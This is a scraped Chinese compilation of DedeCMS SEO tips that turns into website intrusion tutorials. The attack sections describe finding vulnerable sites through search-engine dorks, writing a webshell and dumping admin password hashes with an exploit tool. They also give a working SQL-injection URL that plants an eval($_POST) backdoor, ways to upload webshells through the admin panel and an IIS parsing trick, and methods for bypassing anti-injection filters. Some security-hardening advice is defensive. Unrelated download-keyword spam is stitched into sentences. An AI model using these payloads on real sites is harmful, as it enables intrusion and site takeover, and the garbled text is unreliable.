SEO优化方案大全

网络营销 方案 气瓶 现场处置方案 .pdf气瓶 现场处置方案 .doc见习基地管理方案.doc关于群访事件的化解方案建筑工地扬尘治理专项方案下载 圈子：包括SEO,SEM,电子邮件营销，数据库营销，论坛营销，短信营销，病毒式营销，电子杂志营销等1098个营销方案，供大家学习交流。 圈子地址：99pan.com/quanzi/44356811 dedecms优化方案 　1、将当前位置的“主页”字样，改为“你自己的网站名称”。 　　解释：学习过SEO的朋友一看就知道为什么了，增加内连接，另一个好处就是利用回首页的关键词连接告诉蜘蛛，你的网站定位。其实这点真的很重要。 　　我的一个NBA站，以前也写过很多实验 报告 软件系统测试报告下载sgs报告如何下载关于路面塌陷情况报告535n,sgs报告怎么下载竣工报告下载 ，为了AD色嫌疑不发出来了，我所有的外联不超过3个词：“NBA视频”“NBA视频直播”“NBA直播” ，意思就是告诉蜘蛛，我的网站定位为"NBA视频直播"。这样的结果是，这个网站1个月没更新，其关键词依然占据GG搜索的首页。 　　2、如果你不知道如何定位，或者担心关键词重复，不要写关键词描述标签。 　　这句话咋听起来怎么和第一条矛盾呢，既然第一条是为了告诉蜘蛛其网站的定位，第二条反而将专门用来定位的标签去掉呢! 　　其实，不矛盾，有亮点解释，首页我的前提是“如果”，如果你会描写，那当然好，如果你不会呢，那去掉更好。这样也能起到强调第一条的作用。 　　3、写一个 规范 编程规范下载gsp规范下载钢格栅规范下载警徽规范下载建设厅规范下载 的顶部导航和规范的底部版权。 　　记得规范，代码简洁明了就好。而且尽量做到不要改动…… 　　4、保留自带的搜索，并进行规范的设置。 　　自带的搜索功能是很强大的，假如你网站的内容比较多，那么请将它留下，这样方便用户查找 资料 新概念英语资料下载李居明饿命改运学pdf成本会计期末资料社会工作导论资料工程结算所需资料清单 ，这是人性化优化的一方面，但自带的模板不太漂亮，所以我们就要稍微修饰了一下。而且，这个这个搜索的模板是一个单独模板，结果页面还是有DEDE的连接，建议大家取消。 　　5、修改二级 三级页面的标题，并给每个栏目一个单独的desciption标签。 　　我的建议是： 　　二级页面“栏目名字——网站名字” 　　三级页面“文章标题——网站名字” 　　给每个栏目都有一个单独的desciption标签，很多朋友都会忽略这点。desciption长度30-50字 　　6、使用好关键词关联功能。 　　这个几乎很少人用却是一个很好的功能。 　　我的建议是，开启这个功能，并且关键词关联这样写。 　　比如 文章页面出现 NBA 这个词， 其连接地址连接到www.XXXX.com/plus/search.php?keyword=NBA 　　7、在首页增加几个随即TAG。 　　找到TAG的模板，里面有代码，找到那个随即显示TAG的代码，放在首页，数目5-10个都可以。这样每次蜘蛛来，首页都会有变化。 　　8、自己写文章摘要! 　　这点我觉得很重要，写的好，即使你的文章是采集的，完全可以变成原创。大家可以尝试下…… 　　9、保证尽可能短和简洁明了的URL路径 　　这个不需要多解释 大家都知道。 　　10、关于是否屏蔽搜索引擎抓取评论页 　　其实这个很简单，你有精力和时间管理，完全不用屏蔽，多条好的评论，相当于当前页面更新一次，如果你没有时间管理，那只能屏蔽了。 　　11、如果有条件，自己设置套模板 　　这个是最重要的。默认模板虽然还不错，但使用的人太多，总不太好。根据我的经验，自己设计的模板权重要大大加深。 SEO教程:关键词研究的两个大忌 引导线网页制作网提示您： 关键词研究两大忌 SEO工作中极为关键的一个环节就是关键词研究。在这项工作中网站所有者要确定哪些关键词是最为流行以及与业务最为相关的。往往我们都会生成一些关键词列表，可能包含或不包含最相关关键词对应的URL。但在做关键词研究的过程中，有两个大忌会影响整个SEO 工作的顺利进行。 被搜索量影响 在做关键词研究时很容易得到网站能获取排名的所有潜在关键词的搜索量信息。只是过度关注高搜索量的关键词常常会导致人们无法达到SEO策略所设定的目标。能在某月有百万级甚至更多搜索的关键词排名中获得好位置确实是很棒，但现实是那些词竞争度也相当高，目标针对性也相对较低。所以，结果往往是花了大笔的 SEO 费用，却没能获得更好的投资回报。即便排名能不错，来的大量点击却不那么有针对性，跳出率会相当之高。 更好的选择是挑选更为有针对性的关键词短语，其中包含搜索量较高的关键词。例如，如果我要优化 SEO.com 在“搜索引擎优化”的排名，我宁愿更多的考虑”搜索引擎优化公司”或者 “专业搜索引擎优化服务”，因为着两个长尾包含了“搜索引擎优化”。按照这个策略，网站所有者就能很快排到前面，获得更有针对性的价值流量，跳出率也会相对更低。因为长些的关键词短语也包含了高搜索量的关键词，在那些词排名时也会将你的网站考虑在内。经过几个月的推广，你会看到网站能出现在高搜索量关键词的前30甚至前20位。这样，你就能从长尾关键词获得更好的收益，也能更为保险的投入高搜索量关键词的排名工作。 被相关关键词的数量影响 另一个会影响 SEO 工作进程的大忌是以超大量关键词为目标。依照网站的规模可能会有成百上千的关键词和网站内容相关。将其全部记录在表格里进行跟踪，去优化网站在每一个上的排名确实有点太理想主义。因为，如果SEO工作的关注点分散到了着成千上百个词中，势必会减慢获得高排名的时间。 更好的办法是从那个大列表里选取一小组关键词重点关注。确保这些词都对应到了网站最好的页面，并且设定这些关键词的排名目标。在获得高排名之后，再逐步扩展这个列表。要确保在扩展之后这些小列表里的初始关键词的排名位置。所以对它们保持继续监测和关注相当重要。 不管SEO的预算是大是小都嗯那个从关注高针对性的小组列表关键词获利，但这些最初选出的关键词里要包含高搜索量的关键词。最后，网站必然能获得高排名，更快获得投资回报。 让你的网站出现在搜索引擎的搜索建议里 关键字: google suggest 让Google和百度的搜索建议中出现自己的站名 在Google中输入b的时候会发现提示百度，当在百度中输入g的时候会提示Google，这就是大家都熟悉的搜索建议，如果我们的站点也能被Google或百度提示的话，不说能带来多少流量…至少也是对我们自身的鼓励吧。 搜索建议： 所谓的“搜索建议”就是在Google或百度的搜索框中输入关键字时，搜索框下会自动出现下拉框，给出一些常用的建议词供用户选择性地使用。这些建议词都是最近一段时间内搜索的最热门的词汇。在Google和百度拥有搜索建议词的网站不仅能改善用户体验、提高流量，还能加深访客对网站的印象度，最重要的是能够增强seo：增加搜索引擎对网站的友好度、提高网站在搜索引擎中的权重。 添加搜索建议： 那么该如何做才能让Google和百度这两大霸主在各自的搜索建议中收录我们的站点名字呢，其实并不难，根据我最近一段时间的观察实验发现 Google和百度对搜索建议词的收录情况并不是一成不变的，而是按照搜索次数由大到小排列的。这个搜索次数排行应该是近期一段时间的排行，而不是长期时间的排行。 知道搜索建议的规则就好办了，这样的话我们可以每天都在Google和百度上搜索我们站点的固定关键字（前提是站点已经被收录），然后点击；最好多找几个朋友帮忙，这样的话坚持一段时间，半个月下来Google和百度就可以已经把你输入的关键字收录在他们的搜索建议中了。 写在最后：注意出现了不代表永久都会出现，过一段时间Google和百度就会更新搜索建议的词汇，搜索次数少的自然会被次数多的词汇所取代，所以做好站才是关键，还有要坚持下去。 你能帮助用户 搜索引擎就能帮助你 我个人一直都非常的承认，我对于SEO来说一直是一个在新不过的新手。当遇到问题的时候我也会去那些专业的SEO论他向那些高手们提出我的问题。不敢说那些论坛经常光顾，但我也已经都注册的差不多了。最近发现了一些问题，一致于我考虑到一下一些有关于SEO的个人见解。 在论坛大家讨论研究的时候肯定会留下自己的网址，我也会去看一下他们的网站，但是让我大跌眼界。十个里面几乎八个一眼看去就会让你知道这是一个垃圾站，页面不好看，没有高质量的服务产品，使用也不方便。然后站长还一直斤斤与为什么关键字排名低，为什么pr值不更新，为什么更新少，为什么收录网页这么少 忽然间我意识到一个问题，关于网站的SEO的水平，应该先从一个最根本最基础的方向来在考虑，搜索引擎是干什么的？搜索引擎是为用户提供搜索服务的。怎么才算是好的搜索引擎呢？用户可以在这个搜索引擎中方便的搜索到自己所需要的东西，那么这就是好的搜索引擎。 从这个角度出发，只要你能帮助搜索引擎，那么我想搜索引擎也就会非常无私的去帮助你。网站内容为王，谁都明白这个道理，可为什么每每做起来就会偷工减料的要弄一些伪原创的东西区糊弄所有引擎呢？现在想想百度也真的是可怜，这么多垃圾站针对百度是做这样SEO，百度搜出来的东西当然也就会垃圾多一些了。 那么我说一下关于SEO应该怎么去做（虽说我是一个SEO的新手新手新新手）。 首先网站应该先设计出一个能够吸引人的产品。这一方面主要是考虑到不管是否通过搜索引擎来的用户，首先要来一个就能留住一个，毕竟pv也是一个很重要的数据。而且来说，一个网站的产品才是网站的灵魂，也是最后需要能够盈利的核心点。没有灵魂的网站搜索引擎肯定是不会眷顾很久的。 然后一定要优化网站的用户体验。要让网站外形美观（性感的美女谁不愿意看呢，就把搜索引擎当作色狼吧，呵呵），内在功能全面，方便使用（傻瓜操作时代了，研究高科技是为了方便更多的人使用，而不是让更多的人不明白如何去用，用户没时间去研究你网站功能如何使用，搜索引擎也没时间）。连人脑都不喜欢的弄不明白如何去使用的东西，我想搜索引擎肯定也不会喜欢。 第三，提高自身的原创能力，伪原创不是长久之计，搜索引擎也是在不断发展的，只有提高自身的能力才能让搜索引擎承认你网站的价值。自身能力都打不到，如何能得到别人的信赖呢。 第四。我想说到第四条我真的没有资格在给大家说我的想法了，因为有更多的SEO高手比我还懂。 总结一句话，你能帮助用户，那么搜索引擎就能帮助你。 seo优化之DEDECMS的细节优化策略 大多数站长都很喜欢用dede来建站吧，在建站过程中可能也遇到过这样的问题，废话就不多说了，进入主题，修改前请做好备份！ 第一、栏目url 标准 excel标准偏差excel标准偏差函数exl标准差函数国标检验抽样标准表免费下载红头文件格式标准下载 化当我用dede建了分类了时候，发现在栏目是带index.html的。 修改前：/abc/index.html 修改后：/abc/ 打开文件：i 大多数站长都很喜欢用dede来建站吧，在建站过程中可能也遇到过这样的问题，废话就不多说了，进入主题，修改前请做好备份！ 第一、栏目url标准化 当我用dede建了分类了时候，发现在栏目是带index.html的。 修改前：/abc/index.html 修改后：/abc/ 打开文件：include/channelunit.func.php 大概在171行 $reurl = $typedir.'/'.$defaultname; 修改成： $reurl = $typedir.'/'; 5.5版本不存在这个问题。 第二、栏目标题美化，去掉栏目斜杠。 修改前：顶级栏目 / 一级栏目 修改后：一级栏目 - 顶级栏目 打开文件：templets\default\list_*.htm 将 修改成： ，此方法只适用于二层栏目，希望高手提供更好的方法。 第三、文章分页标题添加序号 修改前：标题、标题、标题 修改后：标题、标题(2)、标题(3) 打开文件：include/arc.archives.class.php 大概在347行修改成以下代码： 以下为引用的内容： //循环生成HTML文件 else { for($i=1;$i<=$this->TotalPage;$i++) { $tempTitle=$this->Fields['title'];//临时存储一个标题副本 2009.10.28 if($i>1) { $truefilename = $this->GetTruePath().$fileFirst."_".$i.".".$this->ShortName; $this->Fields['title'] = $this->Fields['title'].'('.$i.')';//在标题后面多加个序号 2009.10.28 } else { $truefilename = $this->GetTruePath().$filename; } $this->ParseDMFields($i,1); $this->dtp->SaveTo($truefilename); $this->Fields['title']=$tempTitle;//生成html,还原标题 2009.10.28 } } 第四、文章看完了不要忘记了做相关文章推荐哦。 自动关连文档标签引用： 以下为引用的内容： 这些问题相信用dedecms的站长遇到的比较多吧，希望对新手有所帮助，另外还有其他细节就不多说了。 PHP安全的DedeCms安全加固 网站安全从来都是服务器配置、文件权限控制和网站程序三者的相互配合，今天主要看看如果对DedeCms网站程序的改进来提高安全性。“可执行的文件不允许被修改，可写文件不允许被访问”这是网站权限控制的根本原则，网站程序在“可写文件不允许被访问”方面可做许多工作。就拿DedeCMS来说，我们可以在如下几个方式做好保护。 　　1、改名根目录下的data目录，或者移动到网站目录外面 　　data 目录便是最藏污纳垢的地方，系统经常要往这个目录写数据，这个目录下的任何一个文件又都可以通过URL访问到，所以要让浏览器访问不到里面的文件，就需要将此目录改名，或者移动到网站的目录外面去。这些，即使别人通过漏洞往文件里写进了一句话木马，他也找不到此木马所在的文件路径，无法继续展开攻击。因为 DedeCMS程序的不合理，导致改名data目录动作会比较大，具体做法如下： 　　a. 将公开的内容迁移到pub目录（或者其它自定义目录）下，如rss、sitemap、js、enum等，此步骤需要移动文件夹，并修改这些文件的生成路径 　　b. 修改引用程序目录 　　搜索替换“DEDEDATA."/data/” 为 “DEDEDATA."/”，大概替换五六十个地方； 　　搜索替换“DEDEDATA.‘/data/” 为 “DEDEDATA.’/”，大概替换五六十个地方； 　　搜索“/data/”，按具体情况，修改路径类似成为：“$DEDEDATA."/”（注意include目录和后台管理目录都有data文件夹，不需要修改）； 　　c. 修改data文件夹名称，并修改include/common.inc.php文件里的“DEDEDATA”的值，再在后台系统设置>参数设置里修改模板缓存目录，即可修改完成。以后也可以按照此步骤来更改data文件夹名称。 　　2、改名“dede”管理目录，并加固 　　如果把后台隐藏好了，即使别人获得了你的管理员账号、密码，他也无从登录。 　　a.在/dede/config.php里，找到如下行： 1//检验用户登录状态 2$cuserLogin　=　new　userLogin(); 3if($cuserLogin->getUserID()==-1) 4{ 5　　　　header("location:login.php?gotopage=".urlencode($dedeNowurl)); 6} 　　把上面代码，改为： 1//检验用户登录状态 2$cuserLogin　=　new　userLogin(); 3if($cuserLogin->getUserID()==-1) 4{ 5　　　　//header("location:login.php?gotopage=".urlencode($dedeNowurl)); 6　　　　header("HTTP/1.0　404　Not　Found"); 7　　　　exit(); 8} 　　b.修改/dede/login.php的文件名称，并对应的修改/dede/templets/login.htm里的表单提交地址； 　　c.修改/dede/的目录名称； 　　这样，别人在没有登录前，只能访问/dede/login.php改名后的地址，访问其他地址均会获得404错误。 　　当然，做了安全加固后，以后DedeCMS的升级就会有一些麻烦 利用DedeCms最新漏洞入侵网站 关键字: 安全 新版本解决了这个问题 DedeCms是目前网络上比较流行的一款PHP整站程序，中文名为“织梦内容管理系统”。最近，DedeCms出现了一个严重的漏洞，黑客通过漏洞可以得到网站的物理路径，并且能够曝出管理员账户名和密码，最为恐怖的是可以直接向服务器写入Webshell，而不必通过登录网站后台。到底是什么漏洞这么厉害，黑客是如何达到目的的，让我们来一探究竟吧。 漏洞成因 问题出在DedeCms的tag.php文件里，该文件会对变量$tag进行处理，但是由于程序员的疏忽，变量$tag在处理时并不严谨，这样就导致了漏洞的产生。黑客可以利用这个漏洞进行注入攻击，得到网站管理员的账户名和密码简直是小菜一碟，如果该网站的数据库权限为root，黑客还能够直接将Webshell写入到网站目录中，而不必登录网站后台，可谓一击必杀。 寻找入侵目标 入侵第一步当然是寻找目标了，在百度中以“Powered by DedeCms v_5_1_GBK”为关键字进行搜索，可以找到很多符合条件的网站，建议直接将搜索结果翻到20页以后，因为排名较前的网站一般已经被同行“捷足先登” 了。随便点击一个搜索结果打开网站，将其网站复制下来。 运行“DedeCms漏洞利用工具”，将网站的网址复制到“网站”选项处，点击下方的“暴目录”按钮，如果“暴目录”成功，在工具中央的浏览窗口中将会出现一个绿色的页面，页面中会标注有网站的物理路径，本例中为“E:\wwwroot\gqmsg\web”。“暴目录”是利用了网站默认的安装文件/install/index.php来实现的，这是因为网站管理员在安装完网站后忘记删除install文件夹导致的，只要这个文件夹在，任何人都能重新安装网站系统，瞬间就可以让整个网站灰飞烟灭，由此可见网站管理员的安全意识相当淡薄。 图1. 得到网站物理路径 写入Webshell 如果网站的权限是root，我们可以直接向网站目录写入Webshell。点击工具下方的“导目录”按钮，在“网站目录”处会显示导入后的结果，然后点击 “写网马”按钮，工具会将木马写入到网站根目录，文件名为admincsj.php，提示写入成功后我们就可以用木马进行连接了。 运行“lanker微型PHP后门客户端”，在木马地址中填入“http://www.***.com/admincsj.php”，在“基本功能列表”中选择相应的功能就可以执行了。 曝出管理员账户名和密码 如果网站权限不是root，不能直接写入Webshell该怎么办呢？我们可以曝出网站管理员的账户名和密码。点击工具的“暴密码”按钮，在中间的页面中将会出现管理员的账户名和密码，密码是经过MD5加密的，我们可以通过http://www.cmd5.com/网站进行破解，破解的成功率还是很高的。 图2. 曝出账户名和密码 拿到管理员权限后，还有什么我们不能做的呢？ 图3. 破解出密码 dedecms网站入侵拿webshell方法总结 dedecms网站入侵拿webshell方法 dedecms现已广泛流传，对其安全问题不易忽视！了解入侵方法做好网站安全措施。... dedecms网站入侵拿webshell方法 文章作者：udb311 转载请注明：http://www.hackline.net/ 1、注入漏洞 存在注入地址：在域名下输入plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?> http://localhost:802/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?> 注入成功，产生了注入文件。 http://localhost:802/data/mysql_error_trace.php 一句话木马连接上传大马即可！ 2、后台拿webshell 第一种方法，利用文件管理直接创建php大马``` 后台--核心--附件管理--文件式管理器 新建文件，写入大马文件直接访问。 如果没有安装文件管理器，可以查看下插件目录有没有此插件文件。 后台--模块--模块管理--文件管理器 点击安装，然后在创建php大马``` 如果没有安装插件，并删除了插件目录就无法使用此方法。 第二种方法：利用标签源码管理 后台--模板--标签源码管理，随便选择一个标签 点编辑。文件名称输入：格式为。xxx.lib.php,内容输入大马文件即可。 第三种方法、利用模板修改。 此方法利用IIS解析漏洞，前提网站必须在IIS6.0运行。 后台--模板--默认模板管理,随便选择一个模板 点编辑。文件名输入dama.php;1.htm，内容输入大马文件即可。 注意，此情况输入密码可能导致跳转显示无法找到网页，你可以输入密码后，再访问dama.php;1.htm这样就可以了。因为解析时截断了文件名变成dama.php了。 目前本人对此想出以下解决办法 注入漏洞官方已有补丁，6月6号的程序更新至最新补丁即可。 标签源码在线修改，可以修改后台源文件。删除标签在线管理功能，或者改templets_tagsource.php文件名。 模板在线修改，可以通过IIS限制脚本执行。删除或者重命名templets_main.php文件``` 一种防注入代码的绕过学习总结 摘要：1.使用URL编码我们传递的数据，比如select可以编码为selec%74（即将t转换为url编码），这样就可以实现注入了！ 2.使用cookies注入。... 前些阵子讯时系统爆出了很多洞，先看他的怎么写的，下面是从他的admin_conn.asp文件中找到的。 　　sss=LCase(request.servervariables(”QUERY_STRING”)) 　　if instr(sss,”select”)<>0 or instr(sss,”inster”)<>0 or instr(sss,”delete”)<>0 or 　　instr(sss,”(”)<>0 or instr(sss,”‘or”)<>0 then 　　response.write “你的网址不合法” 　　response.end 　　end if 代码使用了 request.servervariables的方法来获得传递过来的数据，然后赋值给sss。再判断传递过来的sss变量中是否含有 select，inster等敏感的字符串，只要有就结束程序。给普通注入造成了极大的麻烦，需要有新的东西出现来突破这个防注入。 现已知的有两种方法： 1.使用URL编码我们传递的数据，比如select可以编码为selec%74（即将t转换为url编码），这样就可以实现注入了！ 2.使用cookies注入。 先看看第1种怎么实现的吧。因为程序接受的参数使用的是request.servervariables，呵呵，这个方法和我们平时的 request不太一样的，因为它接受的数据都会原封不动的接受的，比如我们传递了selec%74，那么这里sss里就会是selec%74，而不是已经解码的select 字符串了。当下面的判断语句来判断时会因为select<>selec%74而绕过检测！ 第2种利用了request的cookie方法来传递数据，为什么呢?看程序的代码我们知道因为他只判断了使用 request.servervariables(”QUERY_STRING”)来接受的数据，我们如果用cookie来传递的话，程序当然不会去检测了，只要在前面的代码中找到一处使用request的方法接收变量的地方。这就是cookie的注射了。比如：前面有这样代码我们就可以实现cookie 注射了.这次代码在讯时admin_news_view.asp中截的。 　　<% 　　newsid=trim(request(”newsid”)) 　　sql = “select * from news where id=”&newsid 　　Set rs = Server.CreateObject(”ADODB.RecordSet”) 　　rs.Open sql,conn,1,1 　　title=rs(”title”) 　　dat=rs(”time”) 　　hit=rs(”hit”)+1 　　content=rs(”content”) 　　%> 使用了request接收，而它会依次的去用3种数据集合（Form，QueryString，cookie）去判断，所以我们可以使用cookie来提交我们构造的SQL语句了.这里就不在截图了，具体可以参考这篇文章《最新版讯时新闻发布系统惊爆cookie漏洞》 但是并不是所有的程序都这么另人兴奋的哦，上次入侵一个站时，就碰到了这种情况，找到了源码下来看，却没有突破这个防注入。代码如下： 　　sub check() 　　Fy_Url=Request.ServerVariables(”QUERY_STRING”) 　　Fy_a=split(Fy_Url,”&”) 　　redim Fy_Cs(ubound(Fy_a)) 　　On Error Resume Next 　　for Fy_x=0 to ubound(Fy_a) 　　Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),”=”)-1) 　　Next 　　For Fy_x=0 to ubound(Fy_Cs) 　　If Fy_Cs(Fy_x)<>”" Then 　　If Instr(LCase(Request(Fy_Cs(Fy_x))),”‘”)<>0 or Instr(LCase(Request(Fy_Cs 　　(Fy_x))),”and”)<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),”select”)<>0 or Instr(LCase 　　(Request(Fy_Cs(Fy_x))),”union”)<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),”from”)<>0 or 　　Instr(LCase(Request(Fy_Cs(Fy_x))),” “)<>0 Then 　　response.Write(”嘿嘿，不要你注射！屏蔽了关键字，但是这个屏蔽程序却不好——如何突破呢？”) 　　Response.End 　　End If 　　End If 　　Next 　　end sub 这样的代码，都是用了Request.ServerVariables(”QUERY_STRING”)来接收的数据，但是你直接将注入的字符URL编码，会看到仍不能注射！ 那到底怎么去突破呢?看下面！lake2大牛曾经写过一篇突破这种防注入的大作，这个方法也就是大牛发现的！ 写的很详细哦，我们就引用大牛的话来解释一下这个绕过机制。 “Request.ServerVariables(”QUERY_STRING”)是得到客户端提交的字符串，这里并不会自动转换url编码，哈哈，如果我们把name进行url编码再提交的话，呵呵，那就可以绕过检查了。”下面是我的理解，因为程序使用 Instr(LCase(Request(Fy_Cs(Fy_x))),”‘”)<>0这样的判断语句，它是判断了name的值即 value，而且使用request来接收数据的.前面我们如果在url里value我们用url编码后来提交，然后当值传递到这里，就又会被解码了，所以程序可以检测得到.注意，但它只是判断了name的值即value，但对name，可以看到没有判断，而它又是通过name这个变量名来判断SQL语句的，所以只要用url编码name就可以了，然后程序仍是去判断name的值，但是这次是i%64，会被转换为id，可是我们并没有赋值给id而是 i%64，呵呵，那么id的值它就会认为是空，就这样绕过了哦！ 可以看出只要能保证前面接收的方式不能解码，后面判断的语句可以解码就可以绕过了。后来胡思乱想到了chr()函数，只是YY了一下…..也没成。 而且这里是不是也可以用cookie注射呢？我测试的时候没有成，可能找的不是用request接受的地方…. dedecms教你如何写一篇英文软文 很多国内的网友做英文站都选择了织梦,其实织梦确实很强大,不过个人还是建议使用国外比较成熟的CMS或者wp都可以的,不过部分用户已经习惯了织梦,而且采集比较顺手,所以就分享了这篇关于用 织梦也就是dedecms做英文站需要改动的地方。 首先就是编码了： 就是安装utf-8的dede……然后在dede论坛里找个英文模板， 安装好后，看看前台，已经成了英文版的了 开始做模板，可以仿照英文站来做。 模板制作要注意几点： 1.字符集问题：charset=utf-8 2.字体用Verdana, Arial, Helvetica, sans-serif，这样的字体显示英文更好看 3,所有页面上不要出现中文字符，比如全角的空格 4.页面布局，细节等要符合老外的习惯 如：时间格式为“月-日-年”，对应的dede标签为：[field:pubdate function=strftime('%m-%d-%Y',@me)/] 5.SEO细节 （1）文章的url处理 大家应该都清楚，google对于url地址的重视程度很高，同一篇标题为old food new tricks的文章，如果url显示为 http://www.xxx.com/list1/20070928/5104.html 显然没有http://www.xxx.com/list1/old-food-new-tricks.html 的权重高。dede默认的生成的页面地址为前者，怎么改成后者显示类型呢？ 进入后台，修改栏目的文章命名规则，默认的为：{typedir}/{Y}{M}{D}/{aid}.html 修改为：{typedir}/{pinyin}.html 我去掉了{Y}{M}{D}，这样减少文章的层级，有利于引擎收录。 具体的修改方法，参考如下： 如题，使用dede让文章标题页显示路径为标题拼音.html,例如：文章标题为：站友网是什么啊，文章路径显示：zhanyouwangshishenmea.html,这样显示的好处是什么？靠，这个还用我说？ 方法： 选择：网站栏目管理，修改栏目的高级选项，文章命名规则：{typedir}/{Y}{M}{D}/{aid}.html 这是默认的状态 修改为：{typedir}/{pinyin}.html 我觉得{Y}{M}{D}没什么用，所以也去掉了。 重新更新一下，看看是否有效果？ 别着急，现在显示出拼音了，zhanyouwangshishenmea_1.html,但是后面还多了个_1,怎么去掉这个呢？ 修改include里面的inc_channel_unit_function文件，找到$articleRule = str_replace("{pinyin}",GetPinyin($title)."_".$aid,$articleRule); 把."_".$aid去掉，就可以了！ 如果文章标题是英文的，会在单词之间加_,但是单词中间加_对gg来说没什么意义，必须改成“-”才可以，修改方法如下 打开 include/inc/inc_fun_funAdmin.php for($i=0;$i<$slen;$i++){ if(ord($str[$i])>0x80) { $c = $str[$i].$str[$i+1]; $i++; if(isset($pinyins[$c])){ if($ishead==0) $restr .= $pinyins[$c]; else $restr .= $pinyins[$c][0]; }else $restr .= "-"; }else if( eregi("[a-z0-9]",$str[$i]) ){ $restr .= $str[$i]; } else{ $restr .= "-"; } } 改 $restr .= "-"; 这些东西 拼音中间加“-” 修改include\inc\inc_fun_funAdmin.php for($i=0;$i<$slen;$i++){ if(ord($str[$i])>0x80) { $c = $str[$i].$str[$i+1]; $i++; if(isset($pinyins[$c])){ if($ishead==0) $restr .= $pinyins[$c]."-" ; if($isclose==0) unset($pinyins); if(substr($restr,-1)=="-") $restr = substr($restr,0,strlen($restr)-1); return $restr; 红色为新加的 （2）meta的处理 我修改article_article.htm的meta为： 注意标签之间必须有一个空格，不然后面的就不起作用了 这样修改后，每篇文章的meta都是不同的 list_article.htm的meta我想实现为 DEDECMS的一些安全问题 关键字: 转 最近忙于谷百优大赛，搞得我都很少写文章了，不过因为某些事情最近频繁使用dedecms，慢慢的由不熟悉变得比较熟悉了，期间也因为自己的疏忽被人入侵挂马了(那个站的词是一个暴利站竞争强所以导致不少恶性竞争)，所以又一些经验可以分享一下。我的谷百优参赛站是谷百优大米有兴趣赞助几个友情链接的可以联系我。呵呵，下面正式进入我们的正题! 　　首先在这里先要鄙视一下那些所谓的黑客，基本上都是一群只会拾人牙慧的垃圾，高手发布了一些教程漏洞，然后找几个软件按图索骥黑了几个网站就把自己封为xx黑客，还要给自己弄一个好像很牛叉却很非主流的代号，然后就不可一世了。什么叫做黑客，那些脚本小子会编程么?有自我探索能力么?能静下心来分析问题么?有万千依靠自己发现漏洞么? 　　其他的不想说太多，只是为网络上存在这群人感到可悲。我不是高手，我也是菜鸟，对网络安全也懂得不多，这里只发一些我所认为的一些安全措施，太深奥的我也不会，所以这个教程应该对菜鸟朋友比较实用。 　　DedeCMS是一款比较常用的CMS，这里我们以这个作为例子简单介绍一些增强网站安全性的措施。 　　第一、安装过程中，数据库表明前缀如果没有特殊必要，最好更改一下，比如dedecms的前缀是dede_，那么你可以修改为xsd_一些其他的名称; 　　第二、安装过程中的用户名不要使用默认的admin、root、administration等一些常用的名称，换一个吧; 　　第三、管理员密码：不要为了省心用自己的名字或者QQ号码之类的，那些无聊的黑客喜欢“社会工程学”在那里瞎猜，说不定还真被人捡到死耗子了；我的一个网友胖子告诉我一个可以进入的DEDECMS站，PR3，管理员账号既然是admin，更可笑的是密码就是123456，密码最好字母数字混合，大小写字母都有，8位以上，加上一些符号更好了。 　　第四、管理后台目录名称，dedecms的登录后台是根目录下的DEDE目录，我用过一些阿D工具包之类的黑客软件，那些软件都是收录一些数据去猜测你的管理后台的，换一个吧，而其最好换一个迷惑一点的，比如dedecms目录下还有一些比如member之类的目录，你可以把dede修改为 members目录之类的名称。 　　第五、其他目录的处理，install删掉或者改为其他名称，还有其他目录由于服务器安全性不够高的缘故会导致爆出目录，例如输入:http://www.xxxx.com/templets(xxx是你的域名)会曝出入下图，对于这样的问题只要在这样的目录加一个 index.html的文件即可解决。 转载自www.gubaiyoudm.com DEDECMS安全设置，解决dedecms经常被挂马的问题 经常看到有的朋友说“DEDE程序有安全问题，我的网站又被挂马了”我却觉得Dede的应该没有问题，根据查看dede的用户表单的源码，都是有过滤的。用dede的用户那么多，如果真的有安全漏洞，我怕用的不会只是几个朋友而已。 下面是黑客常用的SQL注入手段和大家要注意的东西 1.用工具,用黑客的工具去检查你网站的漏洞~当然不要滥用~用些注入SQL的黑客软件检查下你网站就可以了（如啊D注入器等等，我都使用过，没有发现 Dede有漏洞有可以挂码的地方，不信你也可以去测试，当然我不知道不代表没有，但是你也应该知道，使用dede的朋友有多少，如果真的出现很容易被抓的漏洞，要被挂的网站数量恐怕会很恐怖） 2.后台地址一定要改，不要用DEDE这个文件夹做你的后台，有些朋友竟然不知道Dede这个后台文件夹可以改名！？ 3.后台最好加上验证码，虽然麻烦了点，但是可以避免不少的小黑客用社会工程学来破解你的网站（我就试过，很多朋友的密码常常是手机号，域名，qq等等） 4.如果给自己的网站增加了字段（比如要求用户申请时输入生日等等）要过滤，别自己的问题推到了DEDE的头上。（建议有一定PHP技术的朋友去修改，为达到功能不是简单的在前台增加表单后台增加发布表单然后增加数据库字段这么简单，要防止XSS攻击就要注意增加 htmlspecialchars，mysql_escape_string()） 5.还有不少的朋友在自己的空间上为了增加功能还使用了一些小程序（那些程序我也用过忘记删除了，结果被挂码）比如：相册、报名之类的程序，这些程序的作者都是些不出名的，他们的程序基本上会有一定的风险，有的黑客就可以利用这点，上传blackeyes小马（就是木马），得到你的虚拟空间的使用权，然后就是用工具批量挂马。 6.别忽视了IDC服务器商的风险哦，我告诉你~对于黑客来说~为了挂你的站，常常不是使用对点方式的破解，而选择旁注入的方法，他们的方法就是破解与你同一个服务器上的其他网站，不要不信，别人要知道你网站的邻居有哪些轻松的很（进这个网站自己查查看同一ip下的所有网站，输入你的ip地址就可以了(http://www.xxx.com/ ），破解你同一服务器上的其他用户，让你挂马也是很轻松的了（我用这个方法就挂过别人的网站）。对于一些好的服务器尚对于这个限制的厉害，就不会出现这个问题。 7.还有就是你开启的用户上传这一栏最好严格控制一下，这个也比较关键，如果黑客不是破解你后台的话，挂你马也就难多了，因为他们需要上传一个挂马工具上来，如果你已经被挂马了，切记要检查下你的网站是不是允许上传html.php.asp等文件了。 8.时刻关注Dede官方发布的安全补丁，上次出的几个安全补丁我都研究过了，有些漏洞都是因为双重原因才可能被别人利用（Dede竟然也重视了，可见 DEDE还是关注安全问题的，我记得那个会员补丁好象是1月发布的，2月有些黑客网站发布了针对没有打这个补丁的网站进入挂马的文章，竟然还有一些朋友中了~我很无语，希望大家随时关注官方的安全补丁） 